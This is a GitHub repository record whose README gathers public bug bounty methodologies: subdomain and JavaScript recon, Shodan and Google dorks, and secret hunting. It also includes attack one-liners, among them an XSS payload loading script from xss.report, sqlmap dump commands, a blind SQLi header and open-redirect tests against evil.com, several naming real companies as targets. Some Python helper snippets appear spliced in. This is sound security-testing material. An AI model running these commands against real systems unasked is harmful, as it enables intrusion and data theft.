{"id":18563511,"url":"https://github.com/mrvcoder/bug-hunting-methodologies","last_synced_at":"2026-02-02T02:31:59.934Z","repository":{"id":241973905,"uuid":"808350572","full_name":"mrvcoder/Bug-Hunting-methodologies","owner":"mrvcoder","description":"this repo contains some public methodologies which I found from internet (google,telegram,discord,writeups etc..) ","archived":false,"fork":false,"pushed_at":"2024-05-30T22:50:23.000Z","size":35,"stargazers_count":22,"open_issues_count":0,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-06-29T12:43:18.879Z","etag":null,"topics":["bounty","bug","bugbounty","bugbounty-methodology","hack","hunt","information-gathering","methodology","osint","recon","reconnaissance"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mrvcoder.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-05-30T22:19:59.000Z","updated_at":"2025-06-11T07:56:09.000Z","dependencies_parsed_at":"2024-05-31T00:48:25.164Z","dependency_job_id":null,"html_url":"https://github.com/mrvcoder/Bug-Hunting-methodologies","commit_stats":null,"previous_names":["mrvcoder/bug-hunting-methodologies"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/mrvcoder/Bug-Hunting-methodologies","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mrvcoder%2FBug-Hunting-methodologies","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mrvcoder%2FBug-Hunting-methodologies/tags","releases_url":"htt
ps://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mrvcoder%2FBug-Hunting-methodologies/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mrvcoder%2FBug-Hunting-methodologies/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mrvcoder","download_url":"https://codeload.github.com/mrvcoder/Bug-Hunting-methodologies/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mrvcoder%2FBug-Hunting-methodologies/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29001654,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-02T01:32:03.847Z","status":"online","status_checked_at":"2026-02-02T02:00:07.448Z","response_time":58,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bounty","bug","bugbounty","bugbounty-methodology","hack","hunt","information-gathering","methodology","osint","recon","reconnaissance"],"created_at":"2024-11-06T22:12:49.516Z","updated_at":"2026-02-02T02:31:59.903Z","avatar_url":"https://github.com/mrvcoder.png","language":null,"readme":"# Bug-Hunting-methodologies\nthis repo contains some public methodologies which I found from internet (google,telegram,discord,writeups etc..) 

# Help to improve repo
If you find any methodologies, please open a pull request so I can merge them and update the repo :D

# methodology number 1
```
subfinder -d viator.com -all -recursive > subdomain.txt

cat subdomain.txt | httpx-toolkit -ports 80,443,8080,8000,8888 -threads 200 > subdomains_alive.txt

katana -u subdomains_alive.txt -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -kf -jc -fx -ef woff,css,png,svg,jpg,woff2,jpeg,gif -o allurls.txt

cat allurls.txt | grep -E "\.txt|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.json|\.gz|\.rar|\.zip|\.config"

cat allurls.txt | grep -E "\.js$" >> js.txt

cat js.txt | nuclei -t /home/coffinxp/nuclei-templates/http/exposures/

echo www.viator.com | katana -ps | grep -E "\.js$" | nuclei -t /home/coffinxp/nuclei-templates/http/exposures/ -c 30

dirsearch -u https://www.viator.com -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bkp,cache,cgi,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,sql.gz,sql.zip,sql.tar.gz,sql~,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,xml

subfinder -d viator.com | httpx-toolkit -silent | katana -ps -f qurl | gf xss | bxss -appendMode -payload '"><script src=https://xss.report/c/coffinxp></script>' -parameters

subzy run --targets subdomain.txt --concurrency 100 --hide_fails --verify_ssl

python3 corsy.py -i /home/coffinxp/vaitor/subdomains_alive.txt -t 10 --headers "User-Agent: GoogleBot\nCookie: SESSION=Hacked"

nuclei -list subdomains_alive.txt -t /home/coffinxp/Priv8-Nuclei/cors

nuclei -list ~/vaitor/subdomains_alive.txt -tags cves,osint,tech

cat allurls.txt | gf lfi | nuclei -tags lfi
cat allurls.txt | gf redirect | openredirex -p /home/coffinxp/openRedirect
```

---

# methodology number 2

- Source : [https://github.com/RemmyNine/BBH-Recon](https://github.com/RemmyNine/BBH-Recon)
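A quick aside on the extension grep in methodology 1 above: it matches anywhere in the URL, so a path like `/zip-codes/` or `/.configurator/` also hits. If you want the match anchored to the end of the path, a few lines of Python do it (the URLs below are illustrative):

```python
import re

# Extensions that often indicate exposed config/backup files (same list as the grep).
SENSITIVE_EXTS = ("txt", "log", "cache", "secret", "db", "backup",
                  "yml", "json", "gz", "rar", "zip", "config")

def interesting(url: str) -> bool:
    """True if the URL path ends in a sensitive extension.

    Unlike the raw grep, this ignores query/fragment and only matches
    the extension at the end of the path.
    """
    path = url.split("?", 1)[0].split("#", 1)[0]
    return bool(re.search(r"\.(%s)$" % "|".join(SENSITIVE_EXTS), path, re.I))

urls = [
    "https://example.com/db.backup",
    "https://example.com/config.yml?v=2",
    "https://example.com/app.js",
    "https://example.com/zip-codes.html",
]
print([u for u in urls if interesting(u)])
```

Feed it the `allurls.txt` output from katana instead of the hardcoded list.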
- [Wide Recon](#WideRecon)
    - [Subdomain Enumerating](#Subdomain_Enumerating)
        - [Subfinder](https://github.com/projectdiscovery/subfinder) - The GOAT; configure its API keys before you use it. Run it with `subfinder -dL target.txt -all -recursive -o output`
        - [BBot](https://github.com/blacklanternsecurity/bbot) - An alternative to Subfinder.
        - [DNSDumpster](https://dnsdumpster.com/)
        - [crtSh Postgres DB](https://github.com/RemmyNine/Methodology/blob/main/crtsh.sh) -- Connect to the Postgres DB and extract subdomains. Also use the website manually for some validation.
        - [AbuseIPDB](https://github.com/atxiii/small-tools-for-hunters/tree/main/abuse-ip) -- Use Atxiii's script.
        - Favicon Hash -- Write a script to calculate the mmh3 hash of the favicon and search it on shodan.io
        - [Gau](https://github.com/lc/gau) -- `gau --subs example.com | unfurl -u domains | tee >> subs.txt`
        - [Waybackurls](https://github.com/tomnomnom/waybackurls) -- `echo domain.com | waybackurls | unfurl -u domains | tee >> wbuRes.txt`
        - Host header fuzzing on IP + URL.tld -> `ffuf -w wordlist.txt -u "https://domain.tld" -H "Host: FUZZ" -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0'`
        - PTR record from IP
        - Scan ports 80, 443, and 8080 on the target IP address to discover new URLs.
        - Reverse DNS lookup
        - [Adtracker](https://github.com/dhn/udon) -- Use Udon and [BuiltWith](https://builtwith.com/) to search for domains/subdomains sharing the same Ad ID.
      - [DNS BruteForce](#DnsBF)
          - [PureDNS](https://github.com/d3mondev/puredns) --> Do a static DNS bruteforce with multiple wordlists. Assetnote, all.txt by JHaddix, and SecLists are good options.
          - [Gotator](https://github.com/Josue87/gotator) and [DNSGen](https://github.com/AlephNullSK/dnsgen) --> A second-pass, dynamic DNS bruteforce using permutations. *DO NOT SKIP THIS PART*

- [Asset Discovery](#AssetDiscovery)
    - Find ASNs + CIDRs + IPs, NameServers --> port scan + reverse DNS lookup
    - Unique strings, copyrights.
    - Find new assets in news, stock-market filings, partner pages, "about us" pages.
    - Find new assets on Crunchbase and similar websites.
    - Emails --> reverse email lookup
    - MailServers + Certificates --> reverse MX + SSL search (for SSL use crt.sh)
    - Search on different search engines (Google, Bing, Yandex)
    - Google dorks ("acquired by company", "company. All Rights Reserved.", "© 2021 company. All Rights Reserved.", "company. All Rights Reserved." -inurl:company, "acquired by target", "target subsidiaries")
    - Search the SSL cert on Shodan, FOFA and Censys.
    - Find matching DMARC information: [DMARC Live](https://dmarc.live/info/yahoo.com)

----
# methodology number 3
- Description: This is a simple guide to performing **javascript recon** in bug bounty
- Source: [https://gist.github.com/pikpikcu/b034a7e3b8bf966a6eba95acb1fbfe08](https://gist.github.com/pikpikcu/b034a7e3b8bf966a6eba95acb1fbfe08)

Steps
--

 - The first step is to collect as many javascript files as possible (`more files` = `more paths,parameters` -> `more vulns`)

    How many JS files you can get depends a lot on the target (I mostly focus on large targets) and on the tools you use; I use a lot of personal tools for this:

    __Tools:__

    gau - https://github.com/lc/gau

    linkfinder - https://github.com/GerbenJavado/LinkFinder

    getSrc - https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/getsrc.py
    SecretFinder - https://github.com/m4ll0k/SecretFinder

    antiburl - https://github.com/tomnomnom/hacks/tree/master/anti-burl

    antiburl.py - https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/antiburl.py

    ffuf - https://github.com/ffuf/ffuf

    allJsToJson.py (private tool)

    getJswords.py - https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/getjswords.py

    gitHubLinks.py (private tool)

    availableForPurchase.py - https://raw.githubusercontent.com/m4ll0k/Bug-Bounty-Toolz/master/availableForPurchase.py

    BurpSuite - http://portswigger.net/

    jsbeautify.py - https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/jsbeautify.py

    collector.py - https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/collector.py

    getScriptTagContent.py (private tool)

    jsAlert.py (private tool)

     __Description:__

     __gau__ - This tool is great; I usually use it to find as many javascript files as possible. Many companies host their files on third parties, which is very important for a bug hunter because it lets you enumerate a lot more JS files!

        Example:

        paypal.com hosts their files on paypalobjects.com

        $ gau paypalobjects.com | grep -iE '\.js' | grep -ivE '\.json' | sort -u >> paypalJS.txt
        $ gau paypal.com | grep -iE '\.js' | grep -ivE '\.json' | sort -u >> paypalJS.txt

        Don't worry if the files are hosted out of scope; our intent is to enumerate JS files to get more parameters, paths, tokens, API keys, ...

     __linkfinder__ - This tool is great; I usually use it to search for paths and links. Combined with `availableForPurchase.py` and `collector.py` it is awesome!
      ```
      Example:

      $ cat paypalJS.txt | xargs -n2 -I@ bash -c "echo -e '\n[URL]: @\n'; python3 linkfinder.py -i @ -o cli" >> paypalJSPathsWithUrl.txt
      $ cat paypalJSPathsWithUrl.txt | grep -ivF '[URL]:' | sort -u > paypalJSPathsNoUrl.txt
      $ cat paypalJSPathsNoUrl.txt | python3 collector.py output
      ```
     __getSrc__ - Tool to extract script links; the nice thing about this tool is that it makes the URLs absolute!

        Example:

        $ python3 getSrc.py https://www.paypal.com/

        https://www.paypalobjects.com/digitalassets/c/website/js/react-16_6_3-bundle.js
        https://www.paypalobjects.com/tagmgmt/bs-chunk.js

      __SecretFinder__ - Tool to discover sensitive data like API keys, access tokens, authorizations, JWTs, etc. in JS files

      ```
      Example:

      $ cat paypalJS.txt | xargs -n2 -I @ bash -c 'echo -e "\n[URL] @\n"; python3 SecretFinder.py -i @ -o cli' >> paypalJsSecrets.txt
      ```
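SecretFinder is essentially a pile of regexes run over each JS body. A minimal sketch of the idea in Python; the two patterns and the sample input are illustrative, not SecretFinder's actual rule set:

```python
import re

# Two illustrative secret patterns (SecretFinder ships many more).
PATTERNS = {
    "google_api_key": re.compile(r"AIza[0-9A-Za-z\-_]{35}"),
    "aws_access_key": re.compile(r"AKIA[0-9A-Z]{16}"),
}

def find_secrets(js_source: str):
    """Return (pattern_name, match) pairs found in a JS body."""
    hits = []
    for name, rx in PATTERNS.items():
        for match in rx.findall(js_source):
            hits.append((name, match))
    return hits

js = 'var cfg = {key: "AIzaSyA1234567890abcdefghijklmnopqrstu_"};'
print(find_secrets(js))
```

Pipe each downloaded JS file's contents through `find_secrets` to replicate the workflow above without the tool.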
      __antiburl/antiburl.py__ - Takes URLs on stdin, prints them to stdout if they return a 200 OK; antiburl.py is a more advanced version.

      ```
      Example:

      $ cat paypalJS.txt | antiburl > paypalJSAlive.txt
      $ cat paypalJS.txt | python3 antiburl.py -A -X 404 -H 'header:value' 'header2:value2' -N -C "mycookies=10" -T 50
      ```

      __ffuf__ - Tool for fuzzing; I also use it to fuzz for JS files

      ```
      Example:

      $ ffuf -u https://www.paypalobjects.com/js/FUZZ -w jsWordlist.txt -t 200

      Note: top wordlists - https://wordlists.assetnote.io/
      ```

     __allJsToJson.py__ - Makes a request to each URL passed to it, retrieves all the JS files and saves them for me in a JSON file.
     ```js

     $ cat myPaypalUrls.txt | python3 allJsToJson.py output.json
     $ cat output.json

     {
    "url_1": {
        "root": "www.paypal.com",
        "path": "/us/home",
        "url": "https://www.paypal.com/us/home",
        "count_js": "4",
        "results": {
            "script_1": "https://www.paypalobjects.com/web/res/dc9/99e63da7c23f04e84d0e82bce06b5/js/config.js",
            "content": "function()/**/"
        }
    },
    "url_2": {}
    }
     ```
     __gitHubLinks.py__ - Find new links on GitHub, in this case only javascript links

     ```
      Example:

      $ python3 gitHubLinks.py www.paypalobjects.com | grep -iE '\.js'
      ```
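getSrc and getScriptTagContent revolve around one idea: pull script tags out of a page and absolutize the `src` URLs. A hedged stdlib-only sketch of that idea (the class and sample HTML are mine, not m4ll0k's code):

```python
from html.parser import HTMLParser
from urllib.parse import urljoin

class ScriptSrcParser(HTMLParser):
    """Collect absolute URLs from <script src=...> tags, getSrc-style."""
    def __init__(self, base_url: str):
        super().__init__()
        self.base_url = base_url
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                # urljoin turns relative paths into absolute URLs.
                self.scripts.append(urljoin(self.base_url, src))

html = ('<html><script src="/js/app.js"></script>'
        '<script src="https://cdn.example.net/lib.js"></script></html>')
parser = ScriptSrcParser("https://www.example.com/")
parser.feed(html)
print(parser.scripts)
```

In practice you would fetch the page body first and feed it to the parser; inline `<script>` bodies can be captured the same way via `handle_data`.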
     __availableForPurchase.py__ - This tool checks whether a domain is available for purchase; combined with linkfinder and collector it is really powerful. Many times developers mistype a domain, or a page imports an external javascript file from a domain that has expired, etc.

     ```
     Example:

     $ cat paypalJS.txt | xargs -I @ bash -c 'python3 linkfinder.py -i @ -o cli' | python3 collector.py output
     $ cat output/urls.txt | python3 availableForPurchase.py
     [NO]  www.googleapis.com
     [YES] www.gooogleapis.com
     ```

    __BurpSuite__ - Extract the content between script tags; I usually use `getScriptTagContent.py`

    ![burp](https://i.imgur.com/8N3AOWF.png)

    After this, save the content and use linkfinder

    `$ python3 linkfinder.py -i burpscriptscontent.txt -o cli`

    __jsbeautify.py__ - Javascript beautifier

    ```
    Example:

    $ python3 jsbeautify.py https://www.paypalobjects.com/test.js paypal/manualAnalyzis.js
    ```

    __collector.py__ - Splits linkfinder stdout into jsfiles, urls, params, etc.

     ```
     $ python3 linkfinder.py -i https://www.test.com/a.js -o cli | python3 collector.py output
     $ ls output

     files.txt	js.txt		params.txt	paths.txt	urls.txt
     ```

    __jsAlert.py__ - Notifies you if there are any interesting keywords, such as postMessage, onmessage, innerHTML, etc.

    ```
    Example:

    $ cat myjslist.txt | python3 jsAlert.py

    [URL] https://..../test.js

    line:16 - innerHTML

    [URL] https://.../test1.js

    line:3223 - onmessage
    ```

    __getScriptTagContent.py__ - Get the content between script tags

    ```
    Example:

    $ curl -s "https://www.google.com/" | python3 getScriptTagContent.py

    function()/**/...
    ```

    __getJSWords.py__ - Get all the words from a javascript file, excluding javascript keywords

    ```
    Example:

    $ python3 getjswords.py https://www.google.com/test.js

    word
    word1
    ...
```

    As you can see above, this requires making many requests every time. I solve this problem with allJsToJson, which keeps the content of all the JS files for me; the tool deliberately processes only 5 URLs at a time because of the output file size, saving output1.json, output2.json, ... as it goes.

__Other Resources:__

- https://bhattsameer.github.io/2021/01/01/client-side-encryption-bypass-part-1.html
- https://developers.google.com/web/tools/chrome-devtools/javascript
- https://www.youtube.com/watch?v=FTeE3OrTNoA&ab_channel=HackerOne

----

# methodology number 4
- Source : [https://github.com/WadQamar10/My-Hunting-Methodology-/tree/main](https://github.com/WadQamar10/My-Hunting-Methodology-/tree/main)

## Recon :-

- subfinder
```
subfinder -dL domains.txt -o subfinder.txt
subfinder -d inholland.nl -o subfinder.txt
```
- amass
```
go install -v github.com/OWASP/Amass/v3/...@master
amass enum -passive -norecursive -noalts -df domains.txt -o amass.txt
```
- crtfinder
```
python3 crtfinder.py -u alloyhome.com
```
- sublist3r
```
sublist3r -d safesavings.com -o sublist3r.txt
```
- Dork
```
- site:*.ibm.com -site:www.ibm.com
```

## Subdomain Takeover :-

1- Recon (live-subs.txt)
- Nuclei :-
```
- nuclei -t /root/nuclei-templates/takeovers/ -l live-subs.txt
```
- Subzy :- https://github.com/LukaSikic/subzy
```
- subzy run --targets live-subs.txt
- subzy run --target test.google.com
- subzy run --target test.google.com,https://test.yahoo.com
```

## Virtual host scanner :-
```
- git clone https://github.com/jobertabma/virtual-host-discovery.git
- ruby scan.rb --ip=151.101.194.133 --host=cisco.com
```

## JS Hunting :-

```
- echo target.com | gau | grep "\.js" | httpx -content-type | grep 'application/javascript' | awk '{print $1}' | nuclei -t /root/nuclei-templates/exposures/ -silent > secrets.txt
- echo uber.com | gau | grep '\.js$' | httpx -status-code -mc 200 -content-type | grep 'application/javascript'
```
- JSS-Scanner :-
```
- echo "invisionapp.com" | waybackurls | grep -iE '\.js' | grep -ivE '\.json' | sort -u > j.txt
- python3 JSScanner.py
```

## Shodan Dorking :-
```
- ssl.cert.subject.CN:"gevme.com*" 200
- ssl.cert.subject.CN:"*.target.com" "230 login successful" port:"21"
- ssl.cert.subject.CN:"*.target.com"+200 http.title:"Admin"
- Set-Cookie:"mongo-express=" "200 OK"
- ssl:"invisionapp.com" http.title:"index of /"
- ssl:"arubanetworks.com" 200 http.title:"dashboard"
- net:192.168.43.0/24,192.168.40.0/24
- AEM login panel :- git clone https://github.com/0ang3el/aem-hacker.git
```

## Collect all interesting IPs from Shodan and save them in ips.txt
```
- cat ips.txt | httpx > live-ips.txt
- cat live-ips.txt | dirsearch --stdin
```

## Google dorking :-
```
- site:*.gapinc.com inurl:"*admin | login" | inurl:.php | .asp
- intext:"index of /.git"
- site:*.*.edu intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:"Warning: mysql_query()" | intext:"Warning: pg_connect()"
- site:*.mil link:www.facebook.com | link:www.instagram.com | link:www.twitter.com | link:www.youtube.com | link:www.telegram.com | link:www.hackerone.com | link:www.slack.com | link:www.github.com
- inurl:/geoserver/web/ (intext:2.21.4 | intext:2.22.2)
- inurl:/geoserver/ows?service=wfs
```

## Github Dorking on live-subs.txt :-

- git-Grabber :
```
- python3 gitGraber.py -k wordlists/keywords.txt -q "yahoo" -s

- python3 gitGraber.py -k wordlists/keywords.txt -q \"yahoo.com\" -s

- python3 gitGraber.py -k keywordsfile.txt -q \"yahoo.com\" -s -w mywordlist.txt
```

## XSS :-

- Paramspider :
```
- python3 paramspider.py --domain indrive.com
- python3 paramspider.py --domain https://cpcalendars.cartscity.com --exclude woff,css,js,png,svg,php,jpg --output g.txt
- cat indrive.txt | kxss   (looking for reflected :- "<> )
```

## Looking for hidden parameters :-
- Arjun :-
```
- arjun -u https://44.75.33.22/wms/wms.login -w burp-parameter-names.txt
- waybackurls youneedabudget.com | gf xss | grep '=' | qsreplace '"><script>confirm(1)</script>' | while read host; do curl --silent --path-as-is --insecure "$host" | grep -qs "<script>confirm(1)" && echo "$host \033[0;31mVulnerable\n"; done
- dalfox url https://access.epam.com/auth/realms/plusx/protocol/openid-connect/auth?response_type=code -b https://hahwul.xss.ht
- dalfox file urls.txt -b https://hahwul.xss.ht
- echo "https://target.com/some.php?first=hello&last=world" | Gxss -c 100
- cat urls.txt | Gxss -c 100 -p XssReflected
```

## SQL Injection :-
```
- echo https://www.recreation.gov | waybackurls | grep "\?" | uro | httpx -silent > param.txt
- cat subdomains.txt | waybackurls | grep "\?" | uro | httpx -silent > param.txt
- sqlmap -m param.txt --batch --random-agent --level 1 | tee sqlmap.txt
- sqlmap -u https://my.easyname.at/en/login --dbs --forms --crawl=2
```

## SQLi One-Liner :
```
- echo target.com | waybackurls | grep "\?" | uro | httpx -silent > urls; sqlmap -m urls --batch --random-agent --level 1 | tee sqlmap.txt
- subfinder -dL domains.txt | dnsx | waybackurls | uro | grep "\?" | head -20 | httpx -silent > urls; sqlmap -m urls --batch --random-agent --level 1 | tee sqlmap.txt
```

## Dump-Data :-
```
- sqlmap -u http://testphp.vulnweb.com/AJAX/infocateg.php?id=1 --dbs  (databases)

- sqlmap -u http://testphp.vulnweb.com/AJAX/infocateg.php?id=1 --tables -D acuart  (dump DB tables)

- sqlmap -u http://testphp.vulnweb.com/AJAX/infocateg.php?id=1 --columns -T users  (dump table columns)

- sqlmap -u http://testphp.vulnweb.com/AJAX/infocateg.php?id=1 --dump -D acuart -T users
```

## SSTI :-

For testing SSTI, the tplmap tool :

```
- git clone https://github.com/epinna/tplmap.git

- ./tplmap.py -u "domain.com/?parameter=SSTI*"

- httpx -l live_subs.txt --status-code --title -mc 200 -path /phpinfo.php

- httpx -l live_subs.txt --status-code --title -mc 200 -path /composer.json
```

## Testing for XSS and SQLi at the same time

```
- cat subdomains.txt | waybackurls | uro | grep "\?" | httpx -silent > param.txt

- sqlmap -m param.txt --batch --random-agent --level 1 | tee sqlmap.txt

- cat param.txt | kxss
```

## Blind SQL Injection :-

Tip : `X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z`

## Blind XSS :-

```
site:opsgenie.com inurl:"contact" | inurl:"contact-us" | inurl:"contactus" | inurl:"contcat_us" | inurl:"contact_form" | inurl:"contact-form"
```

## Hunting for CORS misconfiguration :-

- https://github.com/chenjj/CORScanner

```
pip install corscanner

corscanner -i live_subdomains.txt -v -t 100
```

- https://github.com/Tanmay-N/CORS-Scanner

```
go install github.com/Tanmay-N/CORS-Scanner@latest

cat CORS-domain.txt | CORS-Scanner
```

## Nmap Scanning :-
```
#- nmap -sS -p- 192.168.1.4  (-sS avoids firewall && connection logging)

#- nmap -sS -p- -iL hosts.txt

#- nmap -Pn -sS -A -sV -sC -p 17,20,21,22,23,24,25,53,69,80,123,137,139,161,177,443,445,1723,3306,4343,8080,8081,8082,8088,8443,8888,27017,27018 -iL liveips.txt -oN scan-result.txt

#- nmap -Pn -A -sV -sC 67.20.129.216 -p 17,20,21,22,23,24,25,53,69,80,123,137,139,161,177,443,445,1723,3306,4343,8080,8081,8082,8088,8443,8888,27017,27018 -oN scan-result.txt --script=vuln

#- nmap -sT -p- 192.168.1.4  (full TCP scan)

#- nmap -sT -p- 192.168.1.5 --script=banner  (service fingerprinting)

#- nmap -sV 192.168.1.4  (service fingerprinting)

#- nmap 192.168.1.5 -O  (OS fingerprinting)

#- nmap 192.168.1.0-255 -sn  (-sn: live hosts on my network)

#- nmap -iL hosts.txt -sn

#- nc -nvz 192.168.1.4 1-65535  (port scanning using nc)

#- nc -vn 34.66.209.2 22  (service fingerprinting)

#- netdiscover  (devices on the network, layer 2)

#- netdiscover -r 192.168.2.0/24  (range)

#- netdiscover -p  (passive)

#- netdiscover -l hosts.txt
```

## Running Nuclei :-

Scanning a target domain with community-curated nuclei templates :-
```
- nuclei -u https://example.com

- nuclei -list urls.txt -t /fuzzing-templates

- nuclei -list live-subs.txt -t /root/nuclei-templates/vulnerabilities -t /root/nuclei-templates/cves -t /root/nuclei-templates/exposures -t /root/nuclei-templates/sqli.yaml

- nuclei -u https://example.com -w workflows/
```

## Open Redirect :-

Open redirection one-liner :-
```
- waybackurls tesorion.nl | grep -a -i \=http | qsreplace 'evil.com' | while read host; do curl -s -L $host -I | grep "evil.com" && echo "$host \033[0;31mVulnerable\n"; done

- httpx -l i.txt -path "///evil.com" -status-code -mc 302
```

-----
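The open-redirect one-liners above grep the followed response for the injected host. The same decision, expressed as a standalone Python check over a captured status code and `Location` header (the function name and normalization are my own sketch; no network involved):

```python
import re
from urllib.parse import urlparse

def looks_like_open_redirect(status: int, location: str,
                             attacker_host: str = "evil.com") -> bool:
    """Flag a 3xx response whose Location resolves to the attacker's host."""
    if not (300 <= status < 400) or not location:
        return False
    # Collapse '///evil.com'-style payloads to '//evil.com' the way browsers do;
    # urlparse then puts the host into netloc.
    loc = re.sub(r"^/{2,}", "//", location.strip())
    host = urlparse(loc).netloc.split("@")[-1].split(":")[0].lower()
    # Exact match or subdomain match; avoids false hits like 'notevil.com'.
    return host == attacker_host or host.endswith("." + attacker_host)

print(looks_like_open_redirect(302, "///evil.com"))
print(looks_like_open_redirect(302, "/account/home"))
```

Feed it the status and `Location` pairs you collect with httpx or curl instead of grepping the raw response.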